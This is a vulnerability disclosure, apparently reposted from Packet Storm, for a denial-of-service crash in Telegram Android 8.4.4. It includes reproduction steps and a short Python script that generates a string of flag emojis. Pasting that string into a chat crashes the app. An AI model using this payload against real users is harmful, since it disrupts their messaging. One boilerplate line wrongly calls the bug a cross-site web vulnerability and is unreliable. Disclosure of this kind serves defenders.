Home Telegram Android 8.4.4
Post
Cancel

Telegram Android 8.4.4

A denial-of-service vulnerability is present in Telegram Android version 8.4.4.

1
MD5 | f6d1f83d5660f0341a5f09928a71fdbf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
    Document Title:
    ===============
    Telegram Android v8.4.4 - Denial of Service (PoC)
    
    
    References (Source):
    ====================
    https://twitter.com/h4shur
    
    
    Release Date:
    =============
    2022-01-30
    
    
    Common Vulnerability Scoring System:
    ====================================
    7.8
    
    
    Product & Service Introduction:
    ===============================
    Telegram is a freeware, cross-platform, cloud-based instant messaging (IM)
    service. The service also provides end-to-end encrypted video calling,
    VoIP, file sharing and several other features. It was launched for iOS on
    14 August 2013 and Android in October 2013. The servers of Telegram are
    distributed worldwide to decrease frequent data load with five data centers
    in different regions, while the operational center is based in Dubai in the
    United Arab Emirates. Various client apps are available for desktop and
    mobile platforms including official apps for Android, iOS, Windows, macOS
    and Linux (although registration requires an iOS or Android device and a
    working phone number). There are also two official Telegram web twin apps 
    WebK and WebZ  and numerous unofficial clients that make use of Telegram's
    protocol. All of Telegram's official components are open source, with the
    exception of the server which is closed-sourced and proprietary.
    
    Telegram provides end-to-end encrypted voice and video calls and optional
    end-to-end encrypted "secret" chats. Cloud chats and groups are encrypted
    between the app and the server, so that ISPs and other third-parties on the
    network can't access data, but the Telegram server can. Users can send text
    and voice messages, make voice and video calls, and share an unlimited
    number of images, documents (2 GB per file), user locations, animated
    stickers, contacts, and audio files. In January 2021, Telegram surpassed
    500 million monthly active users. It was the most downloaded app worldwide
    in January 2021 with 1 billion downloads globally as of late August 2021.
    
    
    Abstract Advisory Information:
    ==============================
    An independent vulnerability researcher discovered Android application
    vulnerabilities in the Telegram application.
    
    
    Affected Product(s):
    ====================
    Vendor: telegram.org / telegram.me / t.me
    Product: Android Telegram application (Android-Application)
    https://telegram.org/android
    
    
    Vulnerability Disclosure Timeline:
    ==================================
    2022-01-30: Researcher Notification & Coordination (Security Researcher)
    2022-01-30: Public Disclosure
    
    
    Discovery Status:
    =================
    Published
    
    
    Exploitation Technique:
    =======================
    local
    
    
    Severity Level:
    ===============
    medium
    
    
    Disclosure Type:
    ================
    Full Disclosure
    
    
    Technical specifications and description:
    ================================
    1.1
    In version 8.4.4 of Android Telegram application, a denial of service
    vulnerability was discovered by H4shur. Vulnerability is in the emojis of
    these messenger.
    
    1.2
    If you send a number of flag emojis with any text on the chat page,
    clicking on that message will stop the program altogether and avoid
    providing services.
    
    
    Proof of Concept (PoC):
    =======================
    1.1
    A Denial of Service (DOS) attack is a type of cyberattack in which a
    malicious person performs an attack with the aim of removing the resources
    of a system from the reach of its users.
    It is natural that if this attack is successful, the result will be a
    slowdown or disabling of the equipment and resources available to the
    victim.
    For security demonstration or to reproduce the persistent cross site web
    vulnerability follow the provided information and steps below to continue.
    
    
    PoC: Exploitation
    1.1
    Run the python script, it will create a new file "outputbufferh4shur.txt".
    1.2
    Run Telegram Android and go to "Saved Messages" or any Chat page.
    1.3
    Copy the content of the file "outputbufferh4shur.txt".
    1.4
    Paste the content of outputbufferh4shur.txt into the "Write a message..."
    and then type any text to this message.
    1.5
    Ops...
    Telegram Crashed <3
    
    
    script:
    bufferh4shur = "🇮🇷" * 114
    try:
        f=open("outputbufferh4shur.txt","w")
        print("[!] Creating %s bytes DOS payload...." %len(bufferh4shur))
        f.write(bufferh4shur)
        f.close()
        print("[!] File Created!")
    except:
        print("File cannot be created!")
    
    
    
    Security Risk:
    ==============
    1.1
    A Denial of Service (DOS) attack is a type of cyberattack in which a
    malicious person performs an attack with the aim of removing the resources
    of a system from the reach of its users.
    It is natural that if this attack is successful, the result will be a
    slowdown or disabling of the equipment and resources available to the
    victim.
    
    
    Credits & Authors:
    ==================
    h4shur
    Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @h4shur
    h4shursec@gmail.com


Source :   https://packetstormsecurity.com

This post is licensed under CC BY 4.0 by the author.